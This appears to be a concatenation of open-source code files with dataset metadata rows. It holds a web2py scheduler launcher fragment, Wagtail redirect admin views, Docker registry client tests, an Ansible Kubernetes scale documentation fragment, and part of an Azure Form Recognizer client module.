cmd = ["/usr/bin/nohup", "/usr/bin/python", "web2py.py", "-K", app_name + ":" + group_name] #, "&"] # "> /dev/null 2>&1 &"]
print "RUN APP: " + str(cmd)
#p = subprocess.Popen(cmd, shell=True, close_fds=True) #, creationflags=0x00000008)
p = subprocess.Popen(cmd, close_fds=True) #, creationflags=0x00000008)
f = open(app_name + '.scheduler.' + group_name + '.pid', 'w')
f.write(str(p.pid))
f.close()
# Should run and block until done
#print p.communicate()[0]
#p.wait()
s.close()
sys.exit(0)
| mit | 8,902,003,102,001,837,000 | 25.64 | 124 | 0.648148 | false |
WQuanfeng/wagtail | wagtail/wagtailredirects/views.py | 10 | 4821 | from django.shortcuts import render, redirect, get_object_or_404
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger
from django.utils.translation import ugettext as _
from django.views.decorators.vary import vary_on_headers
from django.core.urlresolvers import reverse
from wagtail.wagtailadmin.edit_handlers import ObjectList
from wagtail.wagtailadmin.forms import SearchForm
from wagtail.wagtailadmin.utils import permission_required, any_permission_required
from wagtail.wagtailadmin import messages
from wagtail.wagtailredirects import models
REDIRECT_EDIT_HANDLER = ObjectList(models.Redirect.content_panels).bind_to_model(models.Redirect)
@any_permission_required('wagtailredirects.add_redirect', 'wagtailredirects.change_redirect', 'wagtailredirects.delete_redirect')
@vary_on_headers('X-Requested-With')
def index(request):
page = request.GET.get('p', 1)
query_string = request.GET.get('q', "")
ordering = request.GET.get('ordering', 'old_path')
redirects = models.Redirect.get_for_site(site=request.site).prefetch_related('redirect_page')
# Search
if query_string:
redirects = redirects.filter(old_path__icontains=query_string)
# Ordering (A bit useless at the moment as only 'old_path' is allowed)
if ordering not in ['old_path']:
ordering = 'old_path'
if ordering != 'old_path':
redirects = redirects.order_by(ordering)
# Pagination
paginator = Paginator(redirects, 20)
try:
redirects = paginator.page(page)
except PageNotAnInteger:
redirects = paginator.page(1)
except EmptyPage:
redirects = paginator.page(paginator.num_pages)
# Render template
if request.is_ajax():
return render(request, "wagtailredirects/results.html", {
'ordering': ordering,
'redirects': redirects,
'query_string': query_string,
})
else:
return render(request, "wagtailredirects/index.html", {
'ordering': ordering,
'redirects': redirects,
'query_string': query_string,
'search_form': SearchForm(data=dict(q=query_string) if query_string else None, placeholder=_("Search redirects")),
})
@permission_required('wagtailredirects.change_redirect')
def edit(request, redirect_id):
theredirect = get_object_or_404(models.Redirect, id=redirect_id)
form_class = REDIRECT_EDIT_HANDLER.get_form_class(models.Redirect)
if request.POST:
form = form_class(request.POST, request.FILES, instance=theredirect)
if form.is_valid():
form.save()
messages.success(request, _("Redirect '{0}' updated.").format(theredirect.title), buttons=[
messages.button(reverse('wagtailredirects:edit', args=(theredirect.id,)), _('Edit'))
])
return redirect('wagtailredirects:index')
else:
messages.error(request, _("The redirect could not be saved due to errors."))
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
else:
form = form_class(instance=theredirect)
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
return render(request, "wagtailredirects/edit.html", {
'redirect': theredirect,
'edit_handler': edit_handler,
})
@permission_required('wagtailredirects.delete_redirect')
def delete(request, redirect_id):
theredirect = get_object_or_404(models.Redirect, id=redirect_id)
if request.POST:
theredirect.delete()
messages.success(request, _("Redirect '{0}' deleted.").format(theredirect.title))
return redirect('wagtailredirects:index')
return render(request, "wagtailredirects/confirm_delete.html", {
'redirect': theredirect,
})
@permission_required('wagtailredirects.add_redirect')
def add(request):
theredirect = models.Redirect()
form_class = REDIRECT_EDIT_HANDLER.get_form_class(models.Redirect)
if request.POST:
form = form_class(request.POST, request.FILES)
if form.is_valid():
theredirect = form.save()
messages.success(request, _("Redirect '{0}' added.").format(theredirect.title), buttons=[
messages.button(reverse('wagtailredirects:edit', args=(theredirect.id,)), _('Edit'))
])
return redirect('wagtailredirects:index')
else:
messages.error(request, _("The redirect could not be created due to errors."))
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
else:
form = form_class()
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
return render(request, "wagtailredirects/add.html", {
'edit_handler': edit_handler,
})
| bsd-3-clause | 6,852,152,495,657,133,000 | 37.261905 | 129 | 0.675586 | false |
twaugh/docker-registry-client | tests/test_dockerregistryclient.py | 1 | 3833 | from __future__ import absolute_import
from docker_registry_client import DockerRegistryClient
from docker_registry_client.Repository import BaseRepository
import pytest
from requests import HTTPError
from tests.mock_registry import (mock_registry,
mock_v2_registry,
TEST_NAMESPACE,
TEST_REPO,
TEST_NAME,
TEST_TAG)
class TestDockerRegistryClient(object):
@pytest.mark.parametrize('version', [1, 2])
def test_api_version_in_use(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
assert client.api_version == version
@pytest.mark.parametrize('version', [1, 2])
def test_namespaces(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
assert client.namespaces() == [TEST_NAMESPACE]
@pytest.mark.parametrize('version', [1, 2])
@pytest.mark.parametrize(('repository', 'namespace'), [
(TEST_REPO, None),
(TEST_REPO, TEST_NAMESPACE),
('{0}/{1}'.format(TEST_NAMESPACE, TEST_REPO), None),
])
def test_repository(self, version, repository, namespace):
url = mock_registry(version)
client = DockerRegistryClient(url)
repository = client.repository(repository, namespace=namespace)
assert isinstance(repository, BaseRepository)
@pytest.mark.parametrize('version', [1, 2])
def test_repository_namespace_incorrect(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
with pytest.raises(RuntimeError):
client.repository('{0}/{1}'.format(TEST_NAMESPACE, TEST_REPO),
namespace=TEST_NAMESPACE)
@pytest.mark.parametrize('namespace', [TEST_NAMESPACE, None])
@pytest.mark.parametrize('version', [1, 2])
def test_repositories(self, version, namespace):
url = mock_registry(version)
client = DockerRegistryClient(url)
repositories = client.repositories(TEST_NAMESPACE)
assert len(repositories) == 1
assert TEST_NAME in repositories
repository = repositories[TEST_NAME]
assert repository.name == "%s/%s" % (TEST_NAMESPACE, TEST_REPO)
@pytest.mark.parametrize('version', [1, 2])
def test_repository_tags(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
repositories = client.repositories(TEST_NAMESPACE)
assert TEST_NAME in repositories
repository = repositories[TEST_NAME]
tags = repository.tags()
assert len(tags) == 1
assert TEST_TAG in tags
def test_repository_manifest(self):
url = mock_v2_registry()
client = DockerRegistryClient(url)
repository = client.repositories()[TEST_NAME]
manifest, digest = repository.manifest(TEST_TAG)
repository.delete_manifest(digest)
@pytest.mark.parametrize(('client_api_version',
'registry_api_version',
'should_succeed'), [
(1, 1, True),
(2, 2, True),
(1, 2, False),
(2, 1, False),
])
def test_api_version(self, client_api_version, registry_api_version,
should_succeed):
url = mock_registry(registry_api_version)
if should_succeed:
client = DockerRegistryClient(url, api_version=client_api_version)
assert client.api_version == client_api_version
else:
with pytest.raises(HTTPError):
client = DockerRegistryClient(url,
api_version=client_api_version)
client.refresh()
| apache-2.0 | 8,955,497,881,568,592,000 | 39.347368 | 78 | 0.603183 | false |
sestrella/ansible | lib/ansible/plugins/doc_fragments/k8s_scale_options.py | 41 | 1314 | # -*- coding: utf-8 -*-
# Copyright: (c) 2018, Red Hat | Ansible
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Options used by scale modules.
class ModuleDocFragment(object):
DOCUMENTATION = r'''
options:
replicas:
description:
- The desired number of replicas.
type: int
current_replicas:
description:
- For Deployment, ReplicaSet, Replication Controller, only scale, if the number of existing replicas
matches. In the case of a Job, update parallelism only if the current parallelism value matches.
type: int
resource_version:
description:
- Only attempt to scale, if the current object version matches.
type: str
wait:
description:
- For Deployment, ReplicaSet, Replication Controller, wait for the status value of I(ready_replicas) to change
to the number of I(replicas). In the case of a Job, this option is ignored.
type: bool
default: yes
wait_timeout:
description:
- When C(wait) is I(True), the number of seconds to wait for the I(ready_replicas) status to equal I(replicas).
If the status is not reached within the allotted time, an error will result. In the case of a Job, this option
is ignored.
type: int
default: 20
'''
| gpl-3.0 | 719,762,491,698,220,500 | 32.692308 | 118 | 0.684932 | false |
Azure/azure-sdk-for-python | sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_form_recognizer_client.py | 1 | 45361 | # coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
# pylint: disable=protected-access
from typing import Any, IO, Union, List, TYPE_CHECKING
from azure.core.tracing.decorator import distributed_trace
from azure.core.polling.base_polling import LROBasePolling
from ._response_handlers import (
prepare_prebuilt_models,
prepare_content_result,
prepare_form_result,
)
from ._helpers import get_content_type
from ._api_versions import FormRecognizerApiVersion
from ._form_base_client import FormRecognizerClientBase
from ._polling import AnalyzePolling
if TYPE_CHECKING:
from azure.core.polling import LROPoller
from ._models import FormPage, RecognizedForm
class FormRecognizerClient(FormRecognizerClientBase):
"""FormRecognizerClient extracts information from forms and images into structured data.
It is the interface to use for analyzing with prebuilt models (receipts, business cards,
invoices, identity documents), recognizing content/layout from forms, and analyzing
custom forms from trained models. It provides different methods based on inputs from a
URL and inputs from a stream.
:param str endpoint: Supported Cognitive Services endpoints (protocol and hostname,
for example: https://westus2.api.cognitive.microsoft.com).
:param credential: Credentials needed for the client to connect to Azure.
This is an instance of AzureKeyCredential if using an API key or a token
credential from :mod:`azure.identity`.
:type credential: :class:`~azure.core.credentials.AzureKeyCredential` or
:class:`~azure.core.credentials.TokenCredential`
:keyword api_version:
The API version of the service to use for requests. It defaults to the latest service version.
Setting to an older version may result in reduced feature compatibility.
:paramtype api_version: str or ~azure.ai.formrecognizer.FormRecognizerApiVersion
.. admonition:: Example:
.. literalinclude:: ../samples/sample_authentication.py
:start-after: [START create_fr_client_with_key]
:end-before: [END create_fr_client_with_key]
:language: python
:dedent: 8
:caption: Creating the FormRecognizerClient with an endpoint and API key.
.. literalinclude:: ../samples/sample_authentication.py
:start-after: [START create_fr_client_with_aad]
:end-before: [END create_fr_client_with_aad]
:language: python
:dedent: 8
:caption: Creating the FormRecognizerClient with a token credential.
"""
def _prebuilt_callback(
self, raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_prebuilt_models(analyze_result)
@distributed_trace
def begin_recognize_receipts(self, receipt, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given sales receipt.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on a receipt here:
https://aka.ms/formrecognizer/receiptfields
:param receipt: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type receipt: bytes or IO[bytes]
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword str locale: Locale of the receipt. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *locale* and *pages* keyword arguments and support for image/bmp content
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_receipts.py
:start-after: [START recognize_receipts]
:end-before: [END recognize_receipts]
:language: python
:dedent: 8
:caption: Recognize sales receipt fields.
"""
locale = kwargs.pop("locale", None)
pages = kwargs.pop("pages", None)
content_type = kwargs.pop("content_type", None)
include_field_elements = kwargs.pop("include_field_elements", False)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_receipts_from_url() to analyze a receipt from a URL."
)
cls = kwargs.pop("cls", self._prebuilt_callback)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(receipt)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if locale:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"locale": locale})
else:
raise ValueError(
"'locale' is only available for API version V2_1 and up"
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_receipt_async( # type: ignore
file_stream=receipt,
content_type=content_type,
include_text_details=include_field_elements,
cls=cls,
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_receipts_from_url(self, receipt_url, **kwargs):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given sales receipt.
The input document must be the location (URL) of the receipt to be analyzed.
See fields found on a receipt here:
https://aka.ms/formrecognizer/receiptfields
:param str receipt_url: The URL of the receipt to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword str locale: Locale of the receipt. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *locale* and *pages* keyword arguments and support for image/bmp content
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_receipts_from_url.py
:start-after: [START recognize_receipts_from_url]
:end-before: [END recognize_receipts_from_url]
:language: python
:dedent: 8
:caption: Recognize sales receipt fields from a URL.
"""
locale = kwargs.pop("locale", None)
pages = kwargs.pop("pages", None)
include_field_elements = kwargs.pop("include_field_elements", False)
cls = kwargs.pop("cls", self._prebuilt_callback)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if locale:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"locale": locale})
else:
raise ValueError(
"'locale' is only available for API version V2_1 and up"
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_receipt_async( # type: ignore
file_stream={"source": receipt_url},
include_text_details=include_field_elements,
cls=cls,
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_business_cards(self, business_card, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given business card.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on a business card here:
https://aka.ms/formrecognizer/businesscardfields
:param business_card: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type business_card: bytes or IO[bytes]
:keyword str locale: Locale of the business card. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_business_cards* client method
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_business_cards.py
:start-after: [START recognize_business_cards]
:end-before: [END recognize_business_cards]
:language: python
:dedent: 8
:caption: Recognize business cards from a file.
"""
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_business_cards_from_url() to analyze a business card from a URL."
)
include_field_elements = kwargs.pop("include_field_elements", False)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(business_card)
try:
return self._client.begin_analyze_business_card_async( # type: ignore
file_stream=business_card,
content_type=content_type,
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_business_card_async" in str(e):
raise ValueError(
"Method 'begin_recognize_business_cards' is only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_business_cards_from_url(self, business_card_url, **kwargs):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given business card.
The input document must be the location (URL) of the card to be analyzed.
See fields found on a business card here:
https://aka.ms/formrecognizer/businesscardfields
:param str business_card_url: The URL of the business card to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword str locale: Locale of the business card. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_business_cards_from_url* client method
"""
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_business_card_async( # type: ignore
file_stream={"source": business_card_url},
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_business_card_async" in str(e):
raise ValueError(
"Method 'begin_recognize_business_cards_from_url' is "
"only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_identity_documents(self, identity_document, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given identity document.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on an identity document here:
https://aka.ms/formrecognizer/iddocumentfields
:param identity_document: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type identity_document: bytes or IO[bytes]
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_identity_documents* client method
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_identity_documents.py
:start-after: [START recognize_identity_documents]
:end-before: [END recognize_identity_documents]
:language: python
:dedent: 8
:caption: Recognize identity document fields.
"""
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_identity_documents_from_url() to analyze an identity document from a URL."
)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(identity_document)
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_id_document_async( # type: ignore
file_stream=identity_document,
content_type=content_type,
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_id_document_async" in str(e):
raise ValueError(
"Method 'begin_recognize_identity_documents' is only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_identity_documents_from_url(
self, identity_document_url, **kwargs
):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given identity document.
The input document must be the location (URL) of the identity document to be analyzed.
See fields found on an identity document here:
https://aka.ms/formrecognizer/iddocumentfields
:param str identity_document_url: The URL of the identity document to analyze.
The input must be a valid, encoded URL of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_identity_documents_from_url* client method
"""
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_id_document_async( # type: ignore
file_stream={"source": identity_document_url},
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_id_document_async" in str(e):
raise ValueError(
"Method 'begin_recognize_identity_documents_from_url' is "
"only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_invoices(self, invoice, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given invoice.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on a invoice here:
https://aka.ms/formrecognizer/invoicefields
:param invoice: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type invoice: bytes or IO[bytes]
:keyword str locale: Locale of the invoice. Supported locales include: en-US
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_invoices* client method
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_invoices.py
:start-after: [START recognize_invoices]
:end-before: [END recognize_invoices]
:language: python
:dedent: 8
:caption: Recognize invoices from a file.
"""
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_invoice_from_url() to analyze an invoice from a URL."
)
include_field_elements = kwargs.pop("include_field_elements", False)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(invoice)
try:
return self._client.begin_analyze_invoice_async( # type: ignore
file_stream=invoice,
content_type=content_type,
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_invoice_async" in str(e):
raise ValueError(
"Method 'begin_recognize_invoices' is only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_invoices_from_url(self, invoice_url, **kwargs):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given invoice.
The input document must be the location (URL) of the invoice to be analyzed.
See fields found on a invoice card here:
https://aka.ms/formrecognizer/invoicefields
:param str invoice_url: The URL of the invoice to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword str locale: Locale of the invoice. Supported locales include: en-US
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_invoices_from_url* client method
"""
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_invoice_async( # type: ignore
file_stream={"source": invoice_url},
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_invoice_async" in str(e):
raise ValueError(
"Method 'begin_recognize_invoices_from_url' is "
"only available for API version V2_1 and up"
)
raise e
def _content_callback(
self, raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_content_result(analyze_result)
@distributed_trace
def begin_recognize_content(self, form, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[FormPage]]
"""Extract text and content/layout information from a given document.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
:param form: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type form: bytes or IO[bytes]
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str language: The BCP-47 language code of the text in the document.
See supported language codes here:
https://docs.microsoft.com/azure/cognitive-services/form-recognizer/language-support.
Content supports auto language identification and multilanguage documents, so only
provide a language code if you would like to force the documented to be processed as
that specific language.
:keyword str reading_order: Reading order algorithm to sort the text lines returned. Supported
reading orders include: basic (default), natural. Set 'basic' to sort lines left to right and top
to bottom, although in some cases proximity is treated with higher priority. Set 'natural' to sort
lines by using positional information to keep nearby lines together.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.FormPage`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.FormPage]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *pages*, *language* and *reading_order* keyword arguments and support for image/bmp content
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_content.py
:start-after: [START recognize_content]
:end-before: [END recognize_content]
:language: python
:dedent: 8
:caption: Recognize text and content/layout information from a form.
"""
pages = kwargs.pop("pages", None)
language = kwargs.pop("language", None)
content_type = kwargs.pop("content_type", None)
reading_order = kwargs.pop("reading_order", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_content_from_url() to analyze a document from a URL."
)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(form)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
if reading_order:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"reading_order": reading_order})
else:
raise ValueError(
"'reading_order' is only available for API version V2_1 and up"
)
if language:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"language": language})
else:
raise ValueError(
"'language' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_layout_async( # type: ignore
